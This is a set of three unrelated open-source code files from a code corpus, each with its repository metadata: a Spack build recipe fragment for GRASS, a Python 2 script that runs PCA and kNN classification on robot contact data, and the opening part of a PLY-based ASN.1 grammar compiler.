if '+lapack' in spec:
args.append('--with-lapack')
else:
args.append('--without-lapack')
if '+cairo' in spec:
args.append('--with-cairo')
else:
args.append('--without-cairo')
if '+freetype' in spec:
args.append('--with-freetype')
else:
args.append('--without-freetype')
if '+readline' in spec:
args.append('--with-readline')
else:
args.append('--without-readline')
if '+regex' in spec:
args.append('--with-regex')
else:
args.append('--without-regex')
if '+pthread' in spec:
args.append('--with-pthread')
else:
args.append('--without-pthread')
if '+openmp' in spec:
args.append('--with-openmp')
else:
args.append('--without-openmp')
if '+opencl' in spec:
args.append('--with-opencl')
else:
args.append('--without-opencl')
if '+bzlib' in spec:
args.append('--with-bzlib')
else:
args.append('--without-bzlib')
if '+zstd' in spec:
args.append('--with-zstd')
else:
args.append('--without-zstd')
if '+gdal' in spec:
args.append('--with-gdal={0}/gdal-config'.format(
spec['gdal'].prefix.bin))
else:
args.append('--without-gdal')
if '+liblas' in spec:
args.append('--with-liblas={0}/liblas-config'.format(
spec['liblas'].prefix.bin))
else:
args.append('--without-liblas')
if '+wxwidgets' in spec:
args.append('--with-wxwidgets={0}/wx-config'.format(
spec['wxwidgets'].prefix.bin))
else:
args.append('--without-wxwidgets')
if '+netcdf' in spec:
args.append('--with-netcdf={0}/bin/nc-config'.format(
spec['netcdf-c'].prefix))
else:
args.append('--without-netcdf')
if '+geos' in spec:
args.append('--with-geos={0}/bin/geos-config'.format(
spec['geos'].prefix))
else:
args.append('--without-geos')
if '+x' in spec:
args.append('--with-x')
else:
args.append('--without-x')
return args
# see issue: https://github.com/spack/spack/issues/11325
# 'Platform.make' is created after configure step
# hence invoke the following function afterwards
@run_after('configure')
def fix_iconv_linking(self):
if self.spec['iconv'].name != 'libiconv':
return
makefile = FileFilter('include/Make/Platform.make')
makefile.filter(r'^ICONVLIB\s*=.*', 'ICONVLIB = -liconv')
|
LLNL/spack
|
var/spack/repos/builtin/packages/grass/package.py
|
Python
|
lgpl-2.1
| 10,619
|
[
"NetCDF"
] |
b0ce8f70226af8fc98bedd6f0b915a77ea155a2b096b7bebe85cd2d2c01f8be5
|
# Principal Component Analysis Code :
from numpy import mean,cov,double,cumsum,dot,linalg,array,rank,size,flipud
from pylab import *
import numpy as np
import matplotlib.pyplot as pp
#from enthought.mayavi import mlab
import scipy.ndimage as ni
import roslib; roslib.load_manifest('sandbox_tapo_darpa_m3')
import rospy
#import hrl_lib.mayavi2_util as mu
import hrl_lib.viz as hv
import hrl_lib.util as ut
import hrl_lib.matplotlib_util as mpu
import pickle
from mvpa.clfs.knn import kNN
from mvpa.datasets import Dataset
from mvpa.clfs.transerror import TransferError
from mvpa.misc.data_generators import normalFeatureDataset
from mvpa.algorithms.cvtranserror import CrossValidatedTransferError
from mvpa.datasets.splitters import NFoldSplitter
import sys
sys.path.insert(0, '/home/tapo/svn/robot1_data/usr/tapo/data_code/Classification/Data/Single_Contact_kNN/Scaled')
from data_method_III import Fmat_original
def pca(X):
#get dimensions
num_data,dim = X.shape
#center data
mean_X = X.mean(axis=1)
M = (X-mean_X) # subtract the mean (along columns)
Mcov = cov(M)
###### Sanity Check ######
i=0
n=0
while i < 123:
j=0
while j < 140:
if X[i,j] != X[i,j]:
print X[i,j]
print i,j
n=n+1
j = j+1
i=i+1
print n
##########################
print 'PCA - COV-Method used'
val,vec = linalg.eig(Mcov)
#return the projection matrix, the variance and the mean
return vec,val,mean_X, M, Mcov
def my_mvpa(Y,num2):
#Using PYMVPA
PCA_data = np.array(Y)
PCA_label_1 = ['Fixed']*35 + ['Movable']*35 + ['Fixed']*35 + ['Movable']*35
PCA_chunk_1 = ['Styrofoam-Fixed']*5 + ['Books-Fixed']*5 + ['Bucket-Fixed']*5 + ['Bowl-Fixed']*5 + ['Can-Fixed']*5 + ['Box-Fixed']*5 + ['Pipe-Fixed']*5 + ['Styrofoam-Movable']*5 + ['Container-Movable']*5 + ['Books-Movable']*5 + ['Cloth-Roll-Movable']*5 + ['Black-Rubber-Movable']*5 + ['Can-Movable']*5 + ['Box-Movable']*5 + ['Rug-Fixed']*5 + ['Bubble-Wrap-1-Fixed']*5 + ['Pillow-1-Fixed']*5 + ['Bubble-Wrap-2-Fixed']*5 + ['Sponge-Fixed']*5 + ['Foliage-Fixed']*5 + ['Pillow-2-Fixed']*5 + ['Rug-Movable']*5 + ['Bubble-Wrap-1-Movable']*5 + ['Pillow-1-Movable']*5 + ['Bubble-Wrap-2-Movable']*5 + ['Pillow-2-Movable']*5 + ['Cushion-Movable']*5 + ['Sponge-Movable']*5
clf = kNN(k=num2)
terr = TransferError(clf)
ds1 = Dataset(samples=PCA_data,labels=PCA_label_1,chunks=PCA_chunk_1)
cvterr = CrossValidatedTransferError(terr,NFoldSplitter(cvtype=1),enable_states=['confusion'])
error = cvterr(ds1)
return (1-error)*100
def result(eigvec_total,eigval_total,mean_data_total,B,C,num_PC):
# Reduced Eigen-Vector Matrix according to highest Eigenvalues..(Considering First 20 based on above figure)
W = eigvec_total[:,0:num_PC]
m_W, n_W = np.shape(W)
# Normalizes the data set with respect to its variance (Not an Integral part of PCA, but useful)
length = len(eigval_total)
s = np.matrix(np.zeros(length)).T
i = 0
while i < length:
s[i] = sqrt(C[i,i])
i = i+1
Z = np.divide(B,s)
m_Z, n_Z = np.shape(Z)
#Projected Data:
Y = (W.T)*B # 'B' for my Laptop: otherwise 'Z' instead of 'B'
m_Y, n_Y = np.shape(Y.T)
return Y.T
if __name__ == '__main__':
Fmat = Fmat_original
# Checking the Data-Matrix
m_tot, n_tot = np.shape(Fmat)
print 'Total_Matrix_Shape:',m_tot,n_tot
eigvec_total, eigval_total, mean_data_total, B, C = pca(Fmat)
#print eigvec_total
#print eigval_total
#print mean_data_total
m_eigval_total, n_eigval_total = np.shape(np.matrix(eigval_total))
m_eigvec_total, n_eigvec_total = np.shape(eigvec_total)
m_mean_data_total, n_mean_data_total = np.shape(np.matrix(mean_data_total))
print 'Eigenvalue Shape:',m_eigval_total, n_eigval_total
print 'Eigenvector Shape:',m_eigvec_total, n_eigvec_total
print 'Mean-Data Shape:',m_mean_data_total, n_mean_data_total
#Recall that the cumulative sum of the eigenvalues shows the level of variance accounted by each of the corresponding eigenvectors. On the x axis there is the number of eigenvalues used.
perc_total = cumsum(eigval_total)/sum(eigval_total)
num_PC=1
while num_PC <=20:
Proj = np.zeros((140,num_PC))
Proj = result(eigvec_total,eigval_total,mean_data_total,B,C,num_PC)
# PYMVPA:
num=0
cv_acc = np.zeros(21)
while num <=20:
cv_acc[num] = my_mvpa(Proj,num)
num = num+1
plot(np.arange(21),cv_acc,'-s')
grid('True')
hold('True')
num_PC = num_PC+1
legend(('1-PC', '2-PCs', '3-PCs', '4-PCs', '5-PCs', '6-PCs', '7-PCs', '8-PCs', '9-PCs', '10-PCs', '11-PC', '12-PCs', '13-PCs', '14-PCs', '15-PCs', '16-PCs', '17-PCs', '18-PCs', '19-PCs', '20-PCs'))
ylabel('Cross-Validation Accuracy')
xlabel('k in k-NN Classifier')
show()
|
tapomayukh/projects_in_python
|
classification/Classification_with_kNN/Single_Contact_Classification/Scaled_Features/best_kNN_PCA/2_categories/test11_cross_validate_categories_mov_fixed_1200ms_scaled_method_iii.py
|
Python
|
mit
| 5,012
|
[
"Mayavi"
] |
dafc16279e4960909d137d444a7bcf165949961f3b9c80283a3d16d40e538429
|
#!/usr/bin/env python
from __future__ import nested_scopes
import visitor
"""Compiler from ASN.1 specification to the Python format acceptable
to my asn1.py module. Loosely based on esnacc grammar. We ignore
MACROs, CONSUMER INVOKES, SUPPLIER INVOKES, and a lot of stuff, for simplicity.
We also ignore the {...} syntax for basic values, so we don't need separate
lexer states.
"""
# TODO:
# toposort structures, handle recursive structures better than PyQuote hack
# figure out mapping of asn.1 modules to python modules (probably as classes)
# handle int_2/num_list
# handle ANY, ANY DESCRIBED BY
# we replace '-' in idents w/ '_' during lexing. Is this OK, or should it be done at output?
class LexError(Exception): pass
class ParseError(Exception): pass
static_tokens = {
'\.' : 'DOT',
',' : 'COMMA',
'\{' : 'LBRACE',
'\}' : 'RBRACE',
'\(' : 'LPAREN',
'\)' : 'RPAREN',
'\[' : 'LBRACK',
'\]' : 'RBRACK',
'<' : 'LT',
'-' : 'MINUS',
'\.\.' : 'RANGE',
'\.\.\.' : 'ELLIPSIS',
'::=': 'GETS',
'\|' : 'BAR',
';' : 'SEMICOLON'
}
# all keys in reserved_words must start w/ upper case
reserved_words = {
'TAGS' : 'TAGS',
'BOOLEAN' : 'BOOLEAN',
'INTEGER' : 'INTEGER',
'BIT' : 'BIT',
'STRING' : 'STRING',
'OCTET' : 'OCTET',
'NULL' : 'NULL',
'SEQUENCE': 'SEQUENCE',
'OF' : 'OF',
'SET' : 'SET',
'IMPLICIT': 'IMPLICIT',
'CHOICE' : 'CHOICE',
'ANY' : 'ANY',
'EXTERNAL' : 'EXTERNAL', # XXX added over base
'OPTIONAL':'OPTIONAL',
'DEFAULT' : 'DEFAULT',
'COMPONENTS': 'COMPONENTS',
'UNIVERSAL' : 'UNIVERSAL',
'APPLICATION' : 'APPLICATION',
'PRIVATE' : 'PRIVATE',
'TRUE' : 'TRUE',
'FALSE' : 'FALSE',
'BEGIN' : 'BEGIN',
'END' : 'END',
'DEFINITIONS' : 'DEFINITIONS',
'EXPLICIT' : 'EXPLICIT',
'ENUMERATED' : 'ENUMERATED',
'EXPORTS' : 'EXPORTS',
'IMPORTS' : 'IMPORTS',
'REAL' : 'REAL',
'INCLUDES': 'INCLUDES',
'MIN' : 'MIN',
'MAX' : 'MAX',
'SIZE' : 'SIZE',
'FROM' : 'FROM',
'WITH' : 'WITH',
'COMPONENT': 'COMPONENT',
'PRESENT' : 'PRESENT',
'ABSENT' : 'ABSENT',
'DEFINED' : 'DEFINED',
'BY' : 'BY',
'PLUS-INFINITY' : 'PLUS_INFINITY',
'MINUS-INFINITY' : 'MINUS_INFINITY',
'GeneralizedTime' : 'GENERALIZEDTIME',
'UTCTime' : 'UTCTIME',
'ObjectDescriptor': 'OBJECTDESCRIPTOR',
'AUTOMATIC': 'AUTOMATIC',
# 'OPERATION' : 'OPERATION',
# 'ARGUMENT' : 'ARGUMENT',
# 'RESULT' : 'RESULT',
# 'ERRORS' : 'ERRORS',
# 'LINKED' : 'LINKED',
# 'ERROR' : 'ERROR',
# 'PARAMETER' : 'PARAMETER',
# 'BIND' : 'BIND',
# 'BIND-ERROR' : 'BIND_ERROR',
# 'UNBIND' : 'UNBIND',
# 'APPLICATION-CONTEXT' : 'AC',
# 'APPLICATON-SERVICE-ELEMENTS' : 'ASES',
# 'REMOTE' : 'REMOTE',
# 'INITIATOR' : 'INITIATOR',
# 'RESPONDER' : 'RESPONDER',
# 'APPLICATION-SERVICE-ELEMENT' : 'ASE',
# 'OPERATIONS' : None,
# 'EXTENSION-ATTRIBUTE' : 'EXTENSION_ATTRIBUTE',
# 'EXTENSIONS' : None,
# 'CHOSEN' : None,
# 'EXTENSION' : None,
# 'CRITICAL': None,
# 'FOR' : None,
# 'SUBMISSION' : None,
# 'DELIVERY' : None,
# 'TRANSFER' : None,
# 'OBJECT' : None,
# 'PORTS' : None,
# 'PORT' : None,
# r'ABSTRACT\s*OPERATIONS' : 'ABSTR_OPS',
# 'REFINE' : None,
# 'AS' : None,
# 'RECURRING' : None
}
for k in static_tokens.keys ():
if static_tokens [k] == None:
static_tokens [k] = k
StringTypes = ['Numeric', 'Printable', 'IA5', 'BMP', 'Universal', 'UTF8',
'Teletex', 'T61', 'Videotex', 'Graphics', 'ISO646', 'Visible',
'General']
string_tok_names = map (lambda x : x + 'String', StringTypes)
tokens = static_tokens.values () + ['OBJECT_IDENTIFIER', 'STRING_T',
'BSTRING', 'HSTRING', 'QSTRING',
'UCASE_IDENT', 'LCASE_IDENT',
'NUMBER', 'PYQUOTE'] + reserved_words.values ()
def t_OBJECT_IDENTIFIER (t):
r"OBJECT\s+IDENTIFIER"
return t
def t_STRING_T(t):
return t
t_STRING_T.__doc__ = "(%s)String" % "|".join (map
(lambda x: '(' + x + ')', StringTypes))
cur_mod = __import__ (__name__) # XXX blech!
for (k, v) in static_tokens.items ():
cur_mod.__dict__['t_' + v] = k
def t_BSTRING (t):
r"'[01]*'B"
return t
def t_HSTRING (t):
r"'[0-9A-Fa-f]*'H"
return t
def t_QSTRING (t):
r'"([^"]|"")*"'
return t # XXX might want to un-""
def t_UCASE_IDENT (t):
r"[A-Z](-[a-zA-Z0-9]|[a-zA-Z0-9])*" # can't end w/ '-'
t.type = reserved_words.get (t.value, "UCASE_IDENT")
# t.value = t.value.replace ('-', '_') # XXX is it OK to do '-' to '_' during lex
return t
def t_LCASE_IDENT (t):
r"[a-z](-[a-zA-Z0-9]|[a-zA-Z0-9])*" # can't end w/ '-'
# t.value = t.value.replace ('-', '_')# XXX is it OK to do '-' to '_' during lex
return t
def t_NUMBER (t):
r"0|([1-9][0-9]*)"
return t
pyquote_str = 'PYQUOTE'
def t_COMMENT(t):
r"--(-[^\-\n]|[^\-\n])*(--|\n|-\n)"
if (t.value.find("\n") >= 0) : t.lineno += 1
if t.value[2:2+len (pyquote_str)] == pyquote_str:
t.value = t.value[2+len(pyquote_str):]
t.value = t.value.lstrip ()
t.type = pyquote_str
return t
return None
t_ignore = " \t\r"
def t_NEWLINE(t):
r'\n+'
t.lineno += t.value.count("\n")
def t_error(t):
print "Error", repr(t.value[:100]), t.lineno
raise LexError
import lex
lexer = lex.lex()
import yacc
class Node:
def __init__(self,*args, **kw):
if len (args) == 0:
self.type = self.__class__.__name__
else:
assert (len(args) == 1)
self.type = args[0]
self.__dict__.update (kw)
def str_child (self, key, child, depth):
if key == 'type': # already processed in str_depth
return ""
if isinstance (child, Node): # ugh
return child.str_depth (depth)
indent = " " * (4 * depth)
keystr = indent + key + ":\n"
if type (child) == type ([]):
return keystr + indent.join (map (str, child)) + "\n"
else:
return keystr + indent + str (child) + "\n"
def str_depth (self, depth): # ugh
indent = " " * (4 * depth)
l = ["%s%s" % (indent, self.type)]
l.append ("".join (map (lambda (k,v): self.str_child (k, v, depth + 1),
self.__dict__.items ())))
return "\n".join (l)
def get_typ (self):
return self
def set_name (self, name): # only overridden for SEQUENCE
pass
def __str__(self):
return "\n" + self.str_depth (0)
class Module (Node):
pass
class ModuleIdent (Node):
pass
class Module_Body (Node):
pass
class Default_Tags (Node):
pass
class Type_Assign (Node):
def __init__ (self, *args, **kw):
Node.__init__ (self, *args, **kw)
to_test = self.val.get_typ ()
to_test.set_name (self.name.name) # currently only for naming SEQUENCE
# for debugging purposes
# XXX should also collect names for SEQUENCE inside SEQUENCE or
# CHOICE or SEQUENCE_OF (where should the SEQUENCE_OF name come
# from? for others, element or arm name would be fine)
class PyQuote (Node):
pass
class Type_Ref (Node):
pass
class Sequence_Of (Node):
pass
class Set_Of (Node):
pass
class Tag (Node):
def get_typ (self):
return self.typ
class ElementType(Node):
pass
class Sequence (Node):
def set_name (self, name):
self.sequence_name = name
class Choice (Node):
pass
class Subtype (Node):
pass
class Size(Node):
pass
class From(Node):
pass
class Constraint (Node):
pass
class Enum (Node):
pass
class Literal (Node):
pass
class NamedNumber (Node):
pass
class NamedNumListBase(Node):
pass
class ValueRange(Node):
pass
class Integer (NamedNumListBase):
asn1_typ = 'INTEGER'
class BitString (NamedNumListBase):
asn1_typ = 'BITSTRING'
class NamedType (Node):
pass
class BaseType (Node):
pass
def p_module_list_1 (t):
'module_list : module_list module_def'
t[0] = t[1] + [t[2]]
def p_module_list_2 (t):
'module_list : module_def'
t[0] = [t[1]]
def p_module_def (t):
'module_def : module_ident DEFINITIONS tag_default GETS BEGIN module_body END'
body = t[6]
t[0] = Module (ident = t[1], tag_def = t[3],
exports = body.exports, imports = body.imports, assign_list = body.assign_list)
def p_tag_default_1 (t):
'''tag_default : EXPLICIT TAGS
| IMPLICIT TAGS
| AUTOMATIC TAGS'''
t[0] = Default_Tags (dfl_tag = t[1])
def p_tag_default_2 (t):
'tag_default : '
t[0] = Default_Tags (dfl_tag = 'EXPLICIT')
def p_module_ident (t):
'module_ident : type_ref assigned_ident' # name, oid
# XXX coerce type_ref to module_ref?
if t[2] == None:
t[0] = ModuleIdent (name=t[1].name, assigned_ident = None)
else:
t[0] = ModuleIdent (name=t[1].name, assigned_ident = t[2])
# XXX originally we had both type_ref and module_ref, but that caused
# a reduce/reduce conflict (because both were UCASE_IDENT). Presumably
# this didn't cause a problem in the original ESNACC grammar because it
# was LALR(1) and PLY is (as of 1.1) only SLR.
#def p_module_ref (t):
# 'module_ref : UCASE_IDENT'
# t[0] = t[1]
def p_assigned_ident_1 (t):
'assigned_ident : oid_val'
t[0] = t[1]
def p_assigned_ident_2 (t):
'assigned_ident : '
t[0] = None
def p_module_body_1 (t):
'module_body : exports imports assign_list'
t[0] = Module_Body (exports = t[1], imports = t[2], assign_list = t[3])
def p_module_body_2 (t):
'module_body : '
t[0] = Module_Body (exports = [], imports = [], assign_list = [])
def p_exports_1 (t):
'exports : EXPORTS syms_exported SEMICOLON'
t[0] = t[2]
def p_exports_2 (t):
'exports : '
t[0] = []
def p_syms_exported_1 (t):
'syms_exported : exp_sym_list'
t[0] = t[1]
def p_syms_exported_2 (t):
'syms_exported : '
t[0] = []
def p_exp_sym_list_1 (t):
'exp_sym_list : symbol'
t[0] = [t[1]]
def p_exp_sym_list_2 (t):
'exp_sym_list : exp_sym_list COMMA symbol'
t[0] = t[1] + [t[3]]
def p_imports_1(t):
'imports : IMPORTS syms_imported SEMICOLON'
t[0] = t[2]
def p_imports_2 (t):
'imports : '
t[0] = []
def p_syms_imported_1(t):
'syms_imported : '
t[0] = []
def p_syms_imported_2 (t):
'syms_imported : syms_from_module_list'
t[0] = t[1]
def p_syms_from_module_list_1 (t):
'syms_from_module_list : syms_from_module_list syms_from_module'
t[0] = t[1] + [t[2]]
def p_syms_from_module_list_2 (t):
'syms_from_module_list : syms_from_module'
t[0] = [t[1]]
def p_syms_from_module (t):
'syms_from_module : symbol_list FROM module_ident'
t[0] = Node ('syms_list', symbol_list = t[1], module = t[3])
def p_symbol_list_1 (t):
'''symbol_list : symbol_list COMMA symbol'''
t[0] = t[1] + [t[3]]
def p_symbol_list_2 (t):
'symbol_list : symbol'
t[0] = [t[1]]
def p_symbol (t):
'''symbol : type_ref
| identifier''' # XXX omit DefinedMacroName
t[0] = t[1]
def p_assign_list_1 (t):
'assign_list : assign_list assign'
t[0] = t[1] + [t[2]]
def p_assign_list_2 (t):
'assign_list : assign SEMICOLON'
t[0] = [t[1]]
def p_assign_list_3 (t):
'assign_list : assign'
t[0] = [t[1]]
def p_assign (t):
'''assign : type_assign
| value_assign
| pyquote'''
t[0] = t[1]
def p_pyquote (t):
'''pyquote : PYQUOTE'''
t[0] = PyQuote (val = t[1])
def p_type_assign (t):
'type_assign : type_ref GETS type'
t[0] = Type_Assign (name = t[1], val = t[3])
def p_type (t): # XXX ignore DefinedMacroType
'''type : builtin_type
| defined_type
| sub_type'''
t[0] = t[1]
def p_ext_type_ref (t):
'ext_type_ref : type_ref DOT type_ref'
# XXX coerce 1st type_ref to module_ref
t[0] = Node ('ext_type_ref', module = t[1], typ = t[3])
def p_defined_type (t): # XXX old comment: could by CharacterString or Useful types too
'''defined_type : ext_type_ref
| type_ref'''
t[0] = t[1]
def p_builtin_type_1 (t):
'''builtin_type : boolean_type
| integer_type
| bitstring_type
| null_type
| sequence_type
| sequenceof_type
| set_type
| setof_type
| choice_type
| selection_type
| tagged_type
| any_type
| oid_type
| enum_type
| real_type
| char_str_type
| useful_type'''
t[0] = t[1]
def p_builtin_type_2 (t):
'builtin_type : OCTET STRING'
t[0] = BaseType (val = 'OCTSTRING')
def p_named_type_1 (t):
'named_type : identifier type'
t[0] = NamedType (ident = t[1], typ = t[2])
def p_named_type_2 (t):
'named_type : type' # XXX handles selectionType as well old comment??
t[0] = NamedType (ident = None, typ = t[1])
def p_boolean_type (t):
'boolean_type : BOOLEAN'
t[0] = BaseType (val = 'BOOLEAN')
def p_integer_type_1 (t):
'integer_type : INTEGER'
t[0] = Integer (named_list = [])
def p_integer_type_2 (t):
'integer_type : INTEGER LBRACE named_number_list RBRACE'
t[0] = Integer (named_list = t[3])
def p_named_number_list_1 (t):
'named_number_list : named_number_list COMMA named_number'
t[0] = t[1] + [t[3]]
def p_named_number_list_2 (t):
'named_number_list : named_number'
t[0] = [t[1]]
def p_named_number (t):
'''named_number : identifier LPAREN signed_number RPAREN
| identifier LPAREN defined_value RPAREN'''
t[0] = NamedNumber (ident = t[1], val = t[3])
# XXX numbers used to errchk for 32-bit ranged
def p_signed_number_1 (t):
'signed_number : NUMBER'
t[0] = t [1]
def p_signed_number_2 (t):
'signed_number : MINUS NUMBER'
t[0] = '-' + t[2]
def p_enum_type_1 (t):
'enum_type : ENUMERATED LBRACE named_number_list RBRACE'
t[0] = Enum (val = t[3])
def p_enum_type_2 (t):
'enum_type : ENUMERATED LBRACE named_number_list COMMA ELLIPSIS RBRACE'
t[0] = Enum (val = t[3], ext=[])
def p_real_type (t):
'real_type : REAL'
t[0] = BaseType (val = 'REAL')
def p_bitstring_type_1 (t):
'bitstring_type : BIT STRING'
t[0] = BitString (named_list = [])
def p_bitstring_type_2 (t):
'bitstring_type : BIT STRING LBRACE named_bit_list RBRACE'
t[0] = BitString (named_list = t[4])
def p_named_bit_list (t):
'named_bit_list : named_number_list'
t[0] = t[1]
def p_null_type (t):
'null_type : NULL'
t[0] = BaseType (val='NULL')
def p_sequence_type (t):
'sequence_type : SEQUENCE LBRACE component_type_lists RBRACE'
# XXX
if isinstance (t[3], list):
assert (len (t[3]) == 0)
t[0] = Sequence (elt_list=[], ext_list = None)
else:
if t[3].has_key('ext_list'):
t[0] = Sequence (elt_list = t[3]['elt_list'], ext_list = t[3]['ext_list'])
else:
t[0] = Sequence (elt_list = t[3]['elt_list'], ext_list = None)
def p_sequence_type_2 (t):
'sequence_type : SEQUENCE LBRACE RBRACE'
t[0] = Sequence (elt_list=[], ext_list =None)
def p_extension_and_exception_1 (t):
'extension_and_exception : ELLIPSIS'
t[0] = []
def p_optional_extension_marker_1 (t):
'optional_extension_marker : COMMA ELLIPSIS'
t[0] = True
def p_optional_extension_marker_2 (t):
'optional_extension_marker : '
t[0] = False
def p_component_type_lists_1 (t):
'component_type_lists : element_type_list'
t[0] = {'elt_list' : t[1]}
def p_component_type_lists_2 (t):
'''component_type_lists : element_type_list COMMA extension_and_exception extension_additions optional_extension_marker'''
t[0] = {'elt_list' : t[1], 'ext_list' : t[4]}
def p_component_type_lists_3 (t):
'''component_type_lists : extension_and_exception extension_additions optional_extension_marker'''
t[0] = []
def p_extension_additions_1 (t):
'extension_additions : extension_addition_list'
t[0] = t[1]
def p_extension_additions_2 (t):
'extension_additions : '
t[0] = []
def p_extension_addition_list_1 (t):
'extension_addition_list : COMMA extension_addition'
t[0] = [t[2]]
def p_extension_addition_list_2 (t):
'extension_addition_list : extension_addition_list COMMA extension_addition'
t[0] = t[1] + [t[3]]
def p_extension_addition_1 (t):
'extension_addition : element_type'
t[0] = t[1]
def p_element_type_list_1 (t):
'element_type_list : element_type'
t[0] = [t[1]]
def p_element_type_list_2 (t):
'element_type_list : element_type_list COMMA element_type'
t[0] = t[1] + [t[3]]
def p_element_type_1 (t):
'element_type : named_type'
t[0] = ElementType (val = t[1], optional = 0, default = None)
def p_element_type_2 (t):
'element_type : named_type OPTIONAL'
t[0] = ElementType (val = t[1], optional = 1, default = None)
def p_element_type_3 (t):
'element_type : named_type DEFAULT named_value'
t[0] = ElementType (val = t[1], optional = 1, default = t[3])
# /*
# * this rules uses NamedValue instead of Value
# * for the stupid choice value syntax (fieldname value)
# * it should be like a set/seq value (ie with
# * enclosing { }
# */
# XXX get to COMPONENTS later
def p_sequenceof_type (t):
'sequenceof_type : SEQUENCE OF type'
t[0] = Sequence_Of (val = t[3], size_constr = None)
def p_set_type (t):
'set_type : SET LBRACE element_type_list RBRACE'
t[0] = Node ('set', val = t[3])
def p_setof_type (t):
'setof_type : SET OF type'
t[0] = Set_Of (val=t[3])
def p_choice_type (t):
'choice_type : CHOICE LBRACE alternative_type_lists RBRACE'
if t[3].has_key('ext_list'):
t[0] = Choice (elt_list = t[3]['elt_list'], ext_list = t[3]['ext_list'])
else:
t[0] = Choice (elt_list = t[3]['elt_list'], ext_list = None)
def p_alternative_type_lists_1 (t):
'alternative_type_lists : alternative_type_list'
t[0] = {'elt_list' : t[1]}
def p_alternative_type_lists_2 (t):
'''alternative_type_lists : alternative_type_list COMMA extension_and_exception extension_addition_alternatives optional_extension_marker'''
t[0] = {'elt_list' : t[1], 'ext_list' : t[4]}
def p_extension_addition_alternatives_1 (t):
'extension_addition_alternatives : extension_addition_alternatives_list'
t[0] = t[1]
def p_extension_addition_alternatives_2 (t):
'extension_addition_alternatives : '
t[0] = []
def p_extension_addition_alternatives_list_1 (t):
'extension_addition_alternatives_list : COMMA extension_addition_alternative'
t[0] = [t[2]]
def p_extension_addition_alternatives_list_2 (t):
'extension_addition_alternatives_list : extension_addition_alternatives_list COMMA extension_addition_alternative'
t[0] = t[1] + [t[3]]
def p_extension_addition_alternative_1 (t):
'extension_addition_alternative : named_type'
t[0] = t[1]
def p_alternative_type_list_1 (t):
'alternative_type_list : named_type'
t[0] = [t[1]]
def p_alternative_type_list_2 (t):
'alternative_type_list : alternative_type_list COMMA named_type'
t[0] = t[1] + [t[3]]
def p_selection_type (t):
'selection_type : identifier LT type'
return Node ('seltype', ident = t[1], typ = t[3])
def p_tagged_type_1 (t):
'tagged_type : tag type'
t[0] = Tag (tag_typ = 'default', tag = t[1], typ = t[2])
def p_tagged_type_2 (t):
'tagged_type : tag IMPLICIT type'
t[0] = Tag (tag_typ = 'implicit', tag = t[1], typ = t[3])
def p_tagged_type_3 (t):
'tagged_type : tag EXPLICIT type'
t[0] = Tag (tag_typ = 'explicit', tag = t[1], typ = t[3])
def p_tag (t):
'tag : LBRACK class class_number RBRACK'
t[0] = Node ('tag', cls = t[2], num = int(t[3]))
# XXX should verify uniqueness of APPLICATION tags per-module
def p_class_number_1 (t):
'class_number : number'
t[0] = t[1]
def p_class_number_2 (t):
'class_number : defined_value'
t[0] = t[1]
def p_class_1 (t):
'''class : UNIVERSAL
| APPLICATION
| PRIVATE'''
t[0] = t[1]
def p_class_2 (t):
'''class : '''
t[0] = 'CONTEXT'
def p_any_type_1 (t):
'any_type : ANY'
t[0] = BaseType (val='ANY')
def p_any_type_2 (t):
'any_type : ANY DEFINED BY identifier'
t[0] = Literal (val='asn1.ANY_constr(def_by="%s")' % t[4]) # XXX
def p_oid_type (t):
'oid_type : OBJECT_IDENTIFIER'
t[0] = BaseType (val='OBJECT_IDENTIFIER') # XXX
def p_useful_type (t):
'''useful_type : GENERALIZEDTIME
| UTCTIME
| OBJECTDESCRIPTOR
| EXTERNAL'''
t[0] = BaseType (val = t[1])
def p_char_str_type (t):
'char_str_type : STRING_T'
t[0] = BaseType (val = t[1])
def p_sub_type_1 (t):
'sub_type : type subtype_spec'
t[0] = t[1]
t[0].subtype = t[2]
def p_sub_type_2 (t):
'sub_type : SET size_constraint OF type'
t[0] = Set_Of (val=t[4], subtype = t[2])
t[0].subtype = t[2]
def p_sub_type_3 (t):
'sub_type : SEQUENCE size_constraint OF type'
t[0] = Sequence_Of (val = t[4], subtype = t[2])
def p_sub_type_4 (t):
'sub_type : SEQUENCE LPAREN size_constraint RPAREN OF type'
t[0] = Sequence_Of (val = t[6], subtype = t[3])
def p_subtype_spec_1 (t):
'subtype_spec : LPAREN subtype_val_set_list RPAREN'
t[0] = t[2]
def p_subtype_spec_2 (t):
'subtype_spec : LPAREN subtype_val_set_list COMMA ELLIPSIS RPAREN'
t[0] = t[2]
def p_subtype_val_set_list_1 (t):
'subtype_val_set_list : subtype_val_set'
t[0] = [t[1]]
def p_subtype_val_set_list_2 (t):
'subtype_val_set_list : subtype_val_set_list BAR subtype_val_set'
t[0] = t[1] + [t[3]]
def p_subtype_val_set (t):
'''subtype_val_set : single_value
| contained_subtype
| value_range
| permitted_alphabet
| size_constraint
| inner_type_constraints'''
t[0] = t[1]
def p_single_value (t):
'single_value : value'
t[0] = t[1]
def p_contained_subtype (t):
'contained_subtype : INCLUDES type'
t[0] = t[2]
def p_value_range (t):
'value_range : lower_end_point RANGE upper_end_point'
t[0] = ValueRange(lo=t[1], hi=t[3])
def p_lower_end_point_1 (t):
'lower_end_point : lower_end_value '
t[0] = t[1]
def p_lower_end_point_2 (t):
'lower_end_point : lower_end_value LT' # XXX LT first?
t[0] = t[1] # but not inclusive range
def p_upper_end_point_1 (t):
'upper_end_point : upper_end_value'
t[0] = t[1]
def p_upper_end_point_2 (t):
'upper_end_point : LT upper_end_value'
t[0] = t[1] # but not inclusive range
def p_lower_end_value (t):
'''lower_end_value : value
| MIN'''
t[0] = t[1] # XXX
def p_upper_end_value (t):
'''upper_end_value : value
| MAX'''
t[0] = t[1]
def p_size_constraint (t):
'size_constraint : SIZE subtype_spec'
t[0] = Size(subtype = t[2])
def p_permitted_alphabet (t):
'permitted_alphabet : FROM subtype_spec'
t[0] = From(subtype = t[2])
def p_inner_type_constraints_1 (t):
'inner_type_constraints : WITH COMPONENT single_type_constraint'
t[0] = t[3]
def p_inner_type_constraints_2 (t):
'inner_type_constraints : WITH COMPONENTS multiple_type_constraints'
t[0] = t[3]
def p_single_type_constraint (t):
'single_type_constraint : subtype_spec'
t[0] = t[1]
# /* this constrains the elmt of setof or seq of */
def p_multiple_type_constraints (t):
'''multiple_type_constraints : full_specification
| partial_specification'''
t[0] = t[1]
def p_full_specification (t):
'full_specification : LBRACE type_constraints RBRACE'
t[0] = t[2]
def p_partial_specification (t):
